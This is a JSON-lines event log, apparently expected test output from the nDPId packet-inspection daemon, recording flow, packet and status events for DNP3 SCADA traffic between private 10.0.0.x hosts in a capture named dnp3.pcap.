00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":445,"packets-processed":444,"total-skipped-flows":0,"total-l4-data-len":7101,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":5,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1097510947092}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":472,"packets-processed":471,"total-skipped-flows":0,"total-l4-data-len":7296,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1097512255234}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-data-len":7593,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":7,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1097513177295}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
